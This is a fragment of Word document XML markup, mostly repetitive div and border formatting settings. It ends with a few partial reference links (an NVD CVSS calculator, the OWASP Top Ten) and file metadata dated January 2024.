        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1501312364">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1543053855">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1598824785">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617372714">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1630670900">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1665667443">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1735424421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="725958766">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2015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463">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="458299229">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11431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885">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1776245260">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1778479355">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="8724395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="647711993">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2047489824">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="15553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5182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2012298145">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="205253061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sChild>
        <w:div w:id="1567643924">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="18089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metrics/cvs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nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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owasp.org/www-project-top-te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evaarcen/RADAR/tree/master/radar/play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Smile</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2024-01-10T18:40:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-10T18:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-10T18:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>